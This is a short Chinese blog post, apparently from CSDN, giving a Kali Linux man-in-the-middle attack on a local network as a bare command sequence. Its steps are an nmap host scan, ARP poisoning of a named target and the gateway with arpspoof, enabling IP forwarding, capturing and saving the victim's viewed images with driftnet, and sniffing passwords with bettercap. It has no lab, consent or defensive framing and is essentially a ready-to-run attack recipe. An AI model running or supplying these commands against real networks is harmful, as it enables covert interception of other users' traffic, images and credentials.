使用kali进行中间人攻击

##扫描局域网中存活的主机
nmap -sS 192.168.1.*

##对网关地址进行染毒
arpspoof -t 192.168.1.56 -r 192.168.1.1
此时目标主机192.168.1.56出现假的断网

##开启路由转发 将目标主机的流量流进攻击机
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
回车以后会出现1,此时目标机的网络恢复正常

##对图片进行嗅探
driftnet -i eth0
打开driftnet查看目标机浏览图片

##创建文件夹存储目标机所浏览的图片
driftnet -i eth0 -a -d xuegod -s

##开始密码嗅探
bettercap -X

发布了6 篇原创文章 · 获赞 16 · 访问量 178

猜你喜欢

转载自blog.csdn.net/weixin_43894771/article/details/104729403